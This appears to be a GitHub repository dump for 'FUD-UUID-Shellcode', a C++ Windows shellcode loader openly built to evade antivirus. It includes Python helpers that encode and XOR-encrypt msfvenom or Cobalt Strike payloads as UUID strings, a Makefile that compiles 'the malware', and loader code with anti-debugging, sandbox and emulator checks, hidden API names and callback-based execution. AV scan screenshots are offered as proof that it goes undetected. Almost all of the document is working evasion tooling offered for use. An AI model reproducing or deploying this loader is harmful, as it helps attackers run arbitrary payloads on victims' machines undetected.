├── PoC.png ├── logo.png ├── antiscan.png ├── static-analysis.png ├── .gitignore ├── Makefile ├── bin_to_uuid.py ├── xor_encryptor.py ├── README.md └── fud-uuid-shc.cpp /PoC.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Bl4ckM1rror/FUD-UUID-Shellcode/HEAD/PoC.png -------------------------------------------------------------------------------- /logo.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Bl4ckM1rror/FUD-UUID-Shellcode/HEAD/logo.png -------------------------------------------------------------------------------- /antiscan.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Bl4ckM1rror/FUD-UUID-Shellcode/HEAD/antiscan.png -------------------------------------------------------------------------------- /static-analysis.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Bl4ckM1rror/FUD-UUID-Shellcode/HEAD/static-analysis.png -------------------------------------------------------------------------------- /.gitignore: -------------------------------------------------------------------------------- 1 | # vscode artifacts 2 | .vscode 3 | 4 | # other artifacts( add whatever it's that you want to exclude from this repo ) 5 | testing 6 | .gdb_history 7 | 8 | # Prerequisites 9 | *.d 10 | 11 | # Compiled Object files 12 | *.slo 13 | *.lo 14 | *.o 15 | *.obj 16 | 17 | # Precompiled Headers 18 | *.gch 19 | *.pch 20 | 21 | # Compiled Dynamic libraries 22 | *.so 23 | *.dylib 24 | *.dll 25 | 26 | # Fortran module files 27 | *.mod 28 | *.smod 29 | 30 | # Compiled Static libraries 31 | *.lai 32 | *.la 33 | *.a 34 | *.lib 35 | 36 | # Executables 37 | *.exe 38 | *.out 39 | *.app 40 | -------------------------------------------------------------------------------- /Makefile: -------------------------------------------------------------------------------- 1 | # compilation information 2 | CXX = x86_64-w64-mingw32-g++ 3 | FLAGS = -I/usr/share/mingw-w64/include/ -L/usr/x86_64-w64-mingw32/lib/ \ 4 | -s -ffunction-sections -fdata-sections -Wno-write-strings -fno-exceptions \ 5 | -fmerge-all-constants -static-libstdc++ -static-libgcc -fpermissive 6 | OPT_FLAGS = -Ofast -flto 7 | DEBUG_FLAGS := -ggdb3 -O0 -DDEBUG -I/usr/share/mingw-w64/include/ -L/usr/x86_64-w64-mingw32/lib/ \ 8 | -ffunction-sections -fdata-sections -Wno-write-strings -fno-exceptions \ 9 | -fmerge-all-constants -static-libstdc++ -static-libgcc -fpermissive 10 | LIBS = -lrpcrt4 11 | 12 | # Necessary File information 13 | SRC_FILE = fud-uuid-shc.cpp 14 | BIN_NAME = lazarus.exe 15 | 16 | all: 17 | @printf "[+] Compiling the malware using ${CXX}...\n\n" 18 | @${CXX} ${FLAGS} ${OPT_FLAGS} ${SRC_FILE} -o ${BIN_NAME} ${LIBS} 19 | @printf "[+] Compiling done! \n\n\tBest of luck from: @Bl4ckMirror & @winterrdog :)" 20 | 21 | debug: 22 | @printf "[+] Compiling the debuggable malware using ${CXX}...\n\n" 23 | @${CXX} ${DEBUG_FLAGS} ${SRC_FILE} -o ${BIN_NAME} ${LIBS} 24 | @printf "[+] Compiling done! \n\n\tBest of debugging luck from: @Bl4ckMirror & @winterrdog :)" 25 | 26 | clean: 27 | @printf "[+] Removing artifacts..." 28 | @rm -rf ${BIN_NAME} 29 | -------------------------------------------------------------------------------- /bin_to_uuid.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/env python3 2 | 3 | 4 | def bin_to_uuid(bin_data, output=None): 5 | from uuid import UUID 6 | 7 | uuid_str = '' 8 | 9 | with open(bin_data, 'rb') as fh: 10 | # read in 16 bytes from the file 11 | data_chunk = fh.read(16) 12 | while data_chunk: 13 | # if chunk is less than 16 bytes then we pad the 14 | # difference with a NOP(0x90) 15 | if len(data_chunk) < 16: 16 | padding = 16 - len(data_chunk) 17 | data_chunk += (b'\x90' * padding) 18 | 19 | uuid_str = "\n".join((uuid_str, f'{UUID(bytes_le=data_chunk)}')) 20 | 21 | # read in more 16 bytes from the file 22 | data_chunk = fh.read(16) 23 | 24 | uuid_str = uuid_str.lstrip('\n') 25 | if output: 26 | with open(output, "w") as fh: 27 | fh.write(uuid_str) 28 | else: 29 | print(uuid_str) 30 | 31 | return 32 | 33 | 34 | def main(): 35 | from argparse import ArgumentParser 36 | 37 | parser = ArgumentParser( 38 | "bin_to_uuid", description="Converts binary files into legit UUID") 39 | 40 | parser.add_argument( 41 | '-p', 42 | '--payload', 43 | required=True, 44 | help='payload (in binary format) that is to be converted to UUID') 45 | parser.add_argument( 46 | '-o', 47 | '--output', 48 | required=False, 49 | help='output file for the payload that was converted to UUID') 50 | 51 | args = vars(parser.parse_args()) 52 | 53 | bin_to_uuid(args['payload'], args['output']) 54 | 55 | 56 | if '__main__' == __name__: 57 | main() 58 | -------------------------------------------------------------------------------- /xor_encryptor.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/env python3 2 | 3 | import sys 4 | 5 | KEY = "CHANGEME" 6 | 7 | 8 | class XorCipher: 9 | __slots__ = ("key", "_key_length", "_fname", "_ciphertext", "_plaintext") 10 | 11 | def __init__(self, filename: str, xor_key: str) -> None: 12 | self.key = str(xor_key) 13 | self._key_length = len(self.key) 14 | self._fname = filename 15 | self._ciphertext = "" 16 | self._plaintext = b"" 17 | 18 | def _xor_crypt(self) -> None: 19 | i = 0 20 | for char in self._plaintext: 21 | self._ciphertext += chr(char ^ ord(self.key[i % self._key_length])) 22 | i += 1 23 | 24 | def _print_ciphertext(self) -> None: 25 | from textwrap import TextWrapper 26 | 27 | wrapper = TextWrapper(width=56, initial_indent="\n") 28 | xor_array = ("{ 0x" + 29 | ", 0x".join(hex(ord(x))[2:].zfill(2).upper() 30 | for x in self._ciphertext) + " };") 31 | wrapped_xor_array = wrapper.fill(xor_array) 32 | print(wrapped_xor_array) 33 | 34 | def run(self) -> None: 35 | try: 36 | with open(self._fname, "rb") as fp: 37 | self._plaintext = fp.read() 38 | except Exception as e: 39 | print(f"[-] Error with specified file({self._fname}): {e}", 40 | file=sys.stderr) 41 | sys.exit(1) 42 | else: 43 | self._xor_crypt() 44 | self._print_ciphertext() 45 | return 46 | 47 | 48 | def main(): 49 | # xor key should be similar to the one in the C++ file(fud-uuid-shc.cpp). Please 50 | # endeavour to change it!! 51 | # Also the "file" opened by default is the file you supply at the command line 52 | 53 | # NOTE: You can port this class( XorCipher ) to your own scripts neatly. 54 | try: 55 | xor_crypt = XorCipher(filename=sys.argv[1], xor_key=KEY) 56 | except IndexError: 57 | print("[-] File argument needed! \n\t%s " % 58 | sys.argv[0], 59 | file=sys.stderr) 60 | sys.exit(1) 61 | else: 62 | xor_crypt.run() 63 | 64 | 65 | if __name__ == "__main__": 66 | main() 67 | -------------------------------------------------------------------------------- /README.md: -------------------------------------------------------------------------------- 1 | # FUD-UUID-Shellcode 2 |

3 |
4 |

5 | 6 | 7 | ## Introduction 8 | Another shellcode injection technique using C++ that attempts to bypass Windows Defender using XOR encryption sorcery and UUID strings **madness** :). 9 | 10 | # How it works 11 | ## Shellcode generation 12 | * Firstly, generate a payload in binary format( using either `Havoc`, `CobaltStrike` or `msfvenom` ) for instance, in `msfvenom`, you can do it like so( the payload I'm using is for **illustration** purposes, you can use whatever payload you want ): 13 | ```sh 14 | msfvenom -p windows/messagebox -f raw -o shellcode.bin 15 | ``` 16 | 17 | * Then convert the shellcode( in binary/raw format ) into a `UUID` string format using the Python3 script, `bin_to_uuid.py`: 18 | ```sh 19 | ./bin_to_uuid.py -p shellcode.bin -o uuid.txt 20 | ``` 21 | 22 | * `xor` encrypt the `UUID` strings in the `uuid.txt` using the Python3 script, `xor_encryptor.py`. 23 | ```sh 24 | ./xor_encryptor.py uuid.txt > xor_crypted_out.txt 25 | ``` 26 | 27 | * Copy the `C-style` array in the file, `xor_crypted_out.txt`, and paste it in the C++ file as an array of `unsigned char` i.e. `unsigned char payload[]{your_output_from_xor_crypted_out.txt}` 28 | 29 | ## Execution 30 | This shellcode injection technique comprises the following subsequent steps: 31 | * First things first, it allocates virtual memory for payload execution and residence via `VirtualAlloc` 32 | * It `xor` decrypts the payload using the `xor` key value 33 | * Uses `UuidFromStringA` to convert `UUID` strings into their binary representation and store them in the previously allocated memory. This is used to avoid the usage of suspicious APIs like `WriteProcessMemory` or `memcpy`. 34 | * Use `EnumChildWindows` to execute the payload previously loaded into memory( in step 1 ) 35 | 36 | # What makes it unique? 37 | * It doesn't use standard functions like `memcpy` or `WriteProcessMemory` which are known to raise alarms to AVs/EDRs, this program uses the Windows API function called `UuidFromStringA` which can be used to decode data as well as write it to memory( **Isn't that great folks?** *And please don't say "NO!"* :) ). 38 | * It uses the **function call obfuscation** trick to call the Windows API functions 39 | * Lastly, because it looks unique :) ( *Isn't it?* :) ) 40 | 41 | # Important 42 | * You have to change the `xor` key(line 85) to what you wish. This also has to be done in the `./xor_encryptor.py` python3 script by changing the `KEY` variable. The keys have to match! 43 | * You have to change the default `executable filename` value(row 90) to your filename. 44 | * `mingw` was used but you can use whichever compiler you prefer. :) 45 | 46 | ## Compile 47 | * Simply run this at your terminal/shell: 48 | ```sh 49 | make 50 | ``` 51 | 52 | # Proof-of-Concept( PoC ) 53 | 54 | ![AV Scan](https://github.com/Bl4ckM1rror/FUD-UUID-Shellcode/blob/main/PoC.png?raw=true) 55 | 56 | # Static Analysis 57 | 58 | ![AV Scan](https://github.com/Bl4ckM1rror/FUD-UUID-Shellcode/blob/main/static-analysis.png?raw=true) 59 | 60 | # AV Scan results 61 | The binary was scanned using [antiscan.me](https://antiscan.me/scan/new/result?id=3IYj6CtMq6h8) on 01/08/2022. 62 | 63 | ![AV Scan](https://github.com/Bl4ckM1rror/FUD-UUID-Shellcode/blob/main/antiscan.png?raw=true) 64 | 65 | # Credits 66 | https://research.nccgroup.com/2021/01/23/rift-analysing-a-lazarus-shellcode-execution-method/ 67 | -------------------------------------------------------------------------------- /fud-uuid-shc.cpp: -------------------------------------------------------------------------------- 1 | #include 2 | 3 | // ------------------ 4 | #include 5 | #include 6 | #include 7 | #include 8 | #include 9 | #include 10 | using std::vector; 11 | 12 | // set your xor key( it should be similar to the one you used in the "xor_encryptor.py" ) 13 | #define XOR_KEY "CHANGEME" 14 | 15 | #define EXE_NAME "lazarus.exe" 16 | 17 | #define FAKE_OFFSET 0x1f // confuse the reverse engineer till she/he laughs at people blinking 18 | 19 | // each single UUID string( C-style string ) comprises: 20 | // std uuid content( 36 characters ) + NULL terminator == 37 21 | #define UUID_LINE_LEN 37 22 | 23 | #define LOTS_OF_MEM 250'000'000 24 | 25 | // the MAGICAL( but random ) byte 26 | #define MAGIC_BYTE 0xf1 27 | 28 | // Uncomment the line below if you're using Visual Studio for compiling. 29 | // #pragma comment(lib, "Rpcrt4.lib") 30 | 31 | BOOL(WINAPI *pMVP)(LPVOID lpAddress, SIZE_T dwSize, DWORD flNewProtect, PDWORD lpflOldProtect); 32 | LPVOID(WINAPI *pMVA)(LPVOID lpAddress, SIZE_T dwSize, DWORD flAllocationType, DWORD flProtect); 33 | 34 | typedef LPVOID(WINAPI *pVirtualAllocExNuma)(HANDLE hProcess, LPVOID lpAddress, SIZE_T dwSize, DWORD flAllocationType, 35 | DWORD flProtect, DWORD nndPreferred); 36 | 37 | bool checkNUMA() 38 | { 39 | LPVOID mem{NULL}; 40 | const char k32DllName[13]{'k', 'e', 'r', 'n', 'e', 'l', '3', '2', '.', 'd', 'l', 'l', 0x0}; 41 | const char vAllocExNuma[19]{'V', 'i', 'r', 't', 'u', 'a', 'l', 'A', 'l', 'l', 42 | 'o', 'c', 'E', 'x', 'N', 'u', 'm', 'a', 0x0}; 43 | pVirtualAllocExNuma myVirtualAllocExNuma = 44 | (pVirtualAllocExNuma)GetProcAddress(GetModuleHandle(k32DllName), vAllocExNuma); 45 | mem = 46 | myVirtualAllocExNuma(GetCurrentProcess(), NULL, 1000, MEM_RESERVE | MEM_COMMIT, PAGE_EXECUTE_READWRITE, 0); 47 | if (mem != NULL) 48 | { 49 | return false; 50 | } 51 | else 52 | { 53 | return true; 54 | } 55 | } 56 | 57 | bool checkResources() 58 | { 59 | SYSTEM_INFO s{}; 60 | MEMORYSTATUSEX ms{}; 61 | DWORD procNum{}; 62 | DWORD ram{}; 63 | 64 | GetSystemInfo(&s); 65 | procNum = s.dwNumberOfProcessors; 66 | if (procNum < 2) 67 | return false; 68 | 69 | ms.dwLength = sizeof(ms); 70 | GlobalMemoryStatusEx(&ms); 71 | ram = ms.ullTotalPhys / 1024 / 1024 / 1024; 72 | if (ram < 2) 73 | return false; 74 | 75 | return true; 76 | } 77 | 78 | void XOR(BYTE *data, unsigned long data_len, const char *key, unsigned long key_len) 79 | { 80 | unsigned long i{0x0345}; 81 | { 82 | size_t i{}; 83 | do 84 | { 85 | i <<= FAKE_OFFSET; 86 | data[i >> FAKE_OFFSET] ^= key[(i >> FAKE_OFFSET) % key_len]; 87 | i >>= FAKE_OFFSET; 88 | ++i; 89 | } while (i % data_len); 90 | } 91 | } 92 | 93 | int main(int argc, char *argv[]) 94 | { 95 | FreeConsole(); 96 | 97 | // payload generation: 98 | // 1. msfvenom -p windows/x64/exec CMD=calc.exe -f raw -o calc.bin 99 | // 2. python ./bin_to_uuid.py -p calc.bin -o calc.uuid 100 | // 3. python ./xor_encryptor.py calc.uuid > calc.xor 101 | vector payload{ 102 | 0x26, 0x7C, 0x79, 0x7D, 0x73, 0x7D, 0x2B, 0x26, 0x6E, 0x2D, 0x79, 0x28, 0x77, 0x68, 0x7D, 0x75, 0x20, 0x78, 103 | 0x6C, 0x7E, 0x77, 0x75, 0x7D, 0x68, 0x77, 0x79, 0x74, 0x7F, 0x73, 0x74, 0x78, 0x75, 0x76, 0x7A, 0x74, 0x7F, 104 | 0x4D, 0x21, 0x7F, 0x76, 0x72, 0x7C, 0x79, 0x7B, 0x71, 0x68, 0x79, 0x7D, 0x75, 0x7D, 0x6C, 0x7B, 0x75, 0x7D, 105 | 0x2F, 0x68, 0x75, 0x78, 0x75, 0x76, 0x6A, 0x7D, 0x2F, 0x70, 0x71, 0x79, 0x79, 0x7A, 0x7F, 0x7D, 0x2F, 0x70, 106 | 0x71, 0x42, 0x76, 0x7C, 0x7F, 0x27, 0x79, 0x7D, 0x71, 0x78, 0x6C, 0x7A, 0x7F, 0x70, 0x7D, 0x68, 0x21, 0x7F, 107 | 0x71, 0x28, 0x6A, 0x71, 0x2C, 0x71, 0x22, 0x65, 0x75, 0x2A, 0x74, 0x74, 0x2E, 0x7C, 0x77, 0x70, 0x72, 0x7F, 108 | 0x24, 0x75, 0x47, 0x72, 0x20, 0x7E, 0x70, 0x7D, 0x24, 0x24, 0x2E, 0x68, 0x71, 0x2B, 0x71, 0x7C, 0x6A, 0x71, 109 | 0x7C, 0x77, 0x73, 0x65, 0x22, 0x7F, 0x24, 0x7C, 0x60, 0x75, 0x27, 0x7C, 0x70, 0x7E, 0x76, 0x26, 0x7C, 0x20, 110 | 0x71, 0x2D, 0x25, 0x44, 0x73, 0x7D, 0x78, 0x74, 0x77, 0x79, 0x74, 0x7C, 0x6A, 0x70, 0x7F, 0x7D, 0x21, 0x65, 111 | 0x79, 0x2C, 0x75, 0x75, 0x60, 0x71, 0x71, 0x7B, 0x22, 0x63, 0x73, 0x7D, 0x7D, 0x74, 0x27, 0x78, 0x79, 0x2C, 112 | 0x7F, 0x75, 0x75, 0x7D, 0x49, 0x7C, 0x79, 0x7E, 0x77, 0x75, 0x7D, 0x75, 0x73, 0x65, 0x22, 0x7E, 0x7F, 0x70, 113 | 0x60, 0x73, 0x74, 0x7F, 0x75, 0x63, 0x73, 0x7D, 0x7D, 0x74, 0x6E, 0x2C, 0x71, 0x7B, 0x77, 0x7D, 0x2F, 0x71, 114 | 0x7B, 0x79, 0x79, 0x7A, 0x73, 0x4F, 0x79, 0x7C, 0x71, 0x78, 0x75, 0x7E, 0x7F, 0x27, 0x60, 0x21, 0x73, 0x78, 115 | 0x70, 0x63, 0x72, 0x73, 0x28, 0x76, 0x6E, 0x7C, 0x79, 0x28, 0x21, 0x68, 0x2E, 0x7C, 0x77, 0x79, 0x79, 0x2C, 116 | 0x74, 0x71, 0x75, 0x7D, 0x77, 0x70, 0x4B, 0x7D, 0x76, 0x71, 0x29, 0x21, 0x75, 0x78, 0x70, 0x63, 0x73, 0x7D, 117 | 0x2E, 0x7C, 0x6E, 0x2B, 0x71, 0x7D, 0x76, 0x68, 0x2C, 0x26, 0x77, 0x79, 0x6C, 0x2D, 0x76, 0x26, 0x74, 0x75, 118 | 0x27, 0x7C, 0x70, 0x7E, 0x76, 0x26, 0x7C, 0x4F, 0x25, 0x79, 0x76, 0x7B, 0x22, 0x75, 0x7E, 0x7D, 0x6E, 0x78, 119 | 0x72, 0x7A, 0x24, 0x68, 0x7F, 0x71, 0x77, 0x2B, 0x6C, 0x7E, 0x7F, 0x71, 0x78, 0x68, 0x70, 0x71, 0x25, 0x7F, 120 | 0x70, 0x70, 0x29, 0x7D, 0x76, 0x70, 0x75, 0x7A, 0x4D, 0x71, 0x74, 0x77, 0x77, 0x7C, 0x71, 0x76, 0x25, 0x68, 121 | 0x29, 0x75, 0x73, 0x79, 0x6C, 0x7A, 0x76, 0x73, 0x7B, 0x68, 0x7B, 0x2A, 0x71, 0x2D, 0x6A, 0x71, 0x75, 0x71, 122 | 0x77, 0x70, 0x23, 0x7A, 0x77, 0x74, 0x2E, 0x71, 0x7A, 0x42, 0x79, 0x2C, 0x73, 0x74, 0x29, 0x75, 0x73, 0x79, 123 | 0x6C, 0x76, 0x7F, 0x75, 0x79, 0x68, 0x73, 0x79, 0x75, 0x76, 0x6A, 0x21, 0x7D, 0x71, 0x72, 0x65, 0x74, 0x76, 124 | 0x73, 0x74, 0x78, 0x7D, 0x76, 0x2D, 0x74, 0x77, 0x72, 0x24, 0x47, 0x70, 0x7A, 0x7C, 0x70, 0x7B, 0x7F, 0x71, 125 | 0x7C, 0x68, 0x76, 0x29, 0x75, 0x7F, 0x6A, 0x7D, 0x7E, 0x71, 0x7B, 0x65, 0x24, 0x2D, 0x75, 0x75, 0x60, 0x71, 126 | 0x72, 0x7D, 0x73, 0x28, 0x21, 0x20, 0x7D, 0x70, 0x7B, 0x7C, 0x70, 0x44, 0x7F, 0x27, 0x79, 0x7D, 0x76, 0x29, 127 | 0x74, 0x77, 0x6A, 0x20, 0x74, 0x74, 0x71, 0x65, 0x27, 0x28, 0x72, 0x72, 0x60, 0x23, 0x25, 0x2E, 0x27, 0x63, 128 | 0x72, 0x21, 0x79, 0x7D, 0x21, 0x29, 0x71, 0x7F, 0x77, 0x75, 0x7D, 0x75, 0x49, 0x78, 0x71, 0x7E, 0x77, 0x75, 129 | 0x7D, 0x75, 0x73, 0x65, 0x75, 0x76, 0x77, 0x75, 0x60, 0x7D, 0x27, 0x70, 0x25, 0x63, 0x77, 0x74, 0x7D, 0x74, 130 | 0x6E, 0x78, 0x71, 0x7E, 0x77, 0x71, 0x7C, 0x27, 0x22, 0x7B, 0x70, 0x76, 0x25, 0x4F, 0x29, 0x70, 0x25, 0x2E, 131 | 0x79, 0x79, 0x71, 0x23, 0x60, 0x23, 0x73, 0x2A, 0x23, 0x63, 0x26, 0x77, 0x2F, 0x70, 0x6E, 0x7D, 0x77, 0x7A, 132 | 0x76, 0x68, 0x2F, 0x24, 0x22, 0x7E, 0x78, 0x7B, 0x25, 0x21, 0x74, 0x21, 0x25, 0x2E, 0x4B, 0x2D, 0x73, 0x7D, 133 | 0x7E, 0x71, 0x7B, 0x2C, 0x74, 0x63, 0x74, 0x26, 0x7F, 0x7D, 0x6E, 0x7F, 0x22, 0x7E, 0x71, 0x68, 0x7D, 0x24, 134 | 0x7B, 0x78, 0x6C, 0x28, 0x25, 0x20, 0x7D, 0x72, 0x76, 0x78, 0x74, 0x2C, 0x25, 0x71, 0x7A, 0x4F, 0x75, 0x29, 135 | 0x77, 0x28, 0x70, 0x77, 0x7C, 0x76, 0x6E, 0x7D, 0x78, 0x7E, 0x77, 0x68, 0x75, 0x7C, 0x77, 0x79, 0x6C, 0x2A, 136 | 0x26, 0x23, 0x2B, 0x68, 0x27, 0x7D, 0x77, 0x7D, 0x71, 0x74, 0x7B, 0x26, 0x75, 0x7B, 0x73, 0x2B, 0x4D, 0x75, 137 | 0x7D, 0x73, 0x76, 0x7F, 0x79, 0x78, 0x72, 0x68, 0x74, 0x75, 0x7A, 0x78, 0x6C, 0x77, 0x77, 0x7C, 0x7D, 0x68, 138 | 0x7A, 0x78, 0x78, 0x7E, 0x6A, 0x7C, 0x7D, 0x7C, 0x73, 0x71, 0x71, 0x77, 0x77, 0x7C, 0x7D, 0x7C, 0x73}; 139 | 140 | char key[]{XOR_KEY}; 141 | 142 | if (strstr(argv[0], EXE_NAME) == NULL) 143 | { 144 | return -2; 145 | } 146 | 147 | if (IsDebuggerPresent()) 148 | { 149 | return -2; 150 | } 151 | 152 | if (checkNUMA()) 153 | { 154 | return -2; 155 | } 156 | 157 | // Uncomment if you're more interested in evading code emulators 158 | // if (checkResources() == false) 159 | // { 160 | // return -2; 161 | // } 162 | 163 | const char virtProt[15]{'V', 'i', 'r', 't', 'u', 'a', 'l', 'P', 'r', 'o', 't', 'e', 'c', 't', 0x0}; 164 | 165 | Sleep(7500); // you could use "ekko" by crack5pider for this, i'm still lazy for this 166 | 167 | const char k32DllName[13]{'k', 'e', 'r', 'n', 'e', 'l', '3', '2', '.', 'd', 'l', 'l', 0x0}; 168 | const char vAlloc[13]{'V', 'i', 'r', 't', 'u', 'a', 'l', 'A', 'l', 'l', 'o', 'c', 0x0}; 169 | 170 | BYTE *junk_mem{(BYTE *)malloc(LOTS_OF_MEM)}; 171 | if (junk_mem) 172 | { 173 | memset(junk_mem, MAGIC_BYTE, LOTS_OF_MEM); 174 | free(junk_mem); 175 | 176 | #if DEBUG 177 | printf("Before xor: %s\n\n", payload.data()); 178 | #endif 179 | 180 | // a NULL terminator can cause very SERIOUS bugs so 1st remove it from the key 181 | XOR(payload.data(), payload.size(), key, (sizeof(key) - 1)); 182 | 183 | #if DEBUG 184 | printf("After xor: %s\n\n", payload.data()); 185 | #endif 186 | 187 | HMODULE k32_handle{GetModuleHandle(k32DllName)}; 188 | BOOL rv{}; 189 | char chars_array[UUID_LINE_LEN]{}; 190 | DWORD oldprotect{0}; 191 | char *temp{}; 192 | 193 | pMVA = GetProcAddress(k32_handle, vAlloc); 194 | PVOID mem = pMVA(0, 0x100000, MEM_COMMIT | MEM_RESERVE, PAGE_READWRITE); 195 | DWORD_PTR hptr = reinterpret_cast(mem); 196 | 197 | int i{}; // fool some AVs. maybe give them a detour :) 198 | for (temp = strtok((char *)payload.data(), "\n"); temp;) 199 | { 200 | strncpy(chars_array, temp, UUID_LINE_LEN); 201 | chars_array[UUID_LINE_LEN - 1] = 0x0; // the NULL byte :) 202 | 203 | #if DEBUG 204 | printf("Sub-string: %s\n\n", chars_array); 205 | #endif 206 | 207 | RPC_CSTR rcp_cstr = (RPC_CSTR)chars_array; 208 | RPC_STATUS status = UuidFromStringA((RPC_CSTR)rcp_cstr, (UUID *)hptr); 209 | if (status != RPC_S_OK) 210 | { 211 | fprintf(stderr, "[-] UUID conversion error: try to make sure your XOR keys match or " 212 | "correct the way you set up the payload.\n"); 213 | CloseHandle(mem); 214 | return EXIT_FAILURE; 215 | } 216 | 217 | hptr += 16; 218 | temp = strtok(NULL, "\n"); 219 | } 220 | 221 | pMVP = GetProcAddress(k32_handle, virtProt); 222 | rv = pMVP(mem, 0x100000, PAGE_EXECUTE_READ, &oldprotect); 223 | if (!rv) 224 | { 225 | fprintf(stderr, "[-] Failed to change the permissions for shellcode's memory\n"); 226 | return EXIT_FAILURE; 227 | } 228 | 229 | // attack! boom! we like planning events! :) 230 | EnumCalendarInfoEx((CALINFO_ENUMPROCEX)mem, LOCALE_USER_DEFAULT, ENUM_ALL_CALENDARS, CAL_SMONTHNAME1); 231 | CloseHandle(mem); 232 | 233 | // should be ready for exfil! but successful code might never reach here! :( 234 | #if DEBUG 235 | printf("[+] PWNED!!\n\t\tYOU'RE IN!\n"); 236 | #endif 237 | return 0; 238 | } 239 | else 240 | { 241 | return EXIT_FAILURE; // survived that AV/EDR. Phew!! 242 | } 243 | } 244 | --------------------------------------------------------------------------------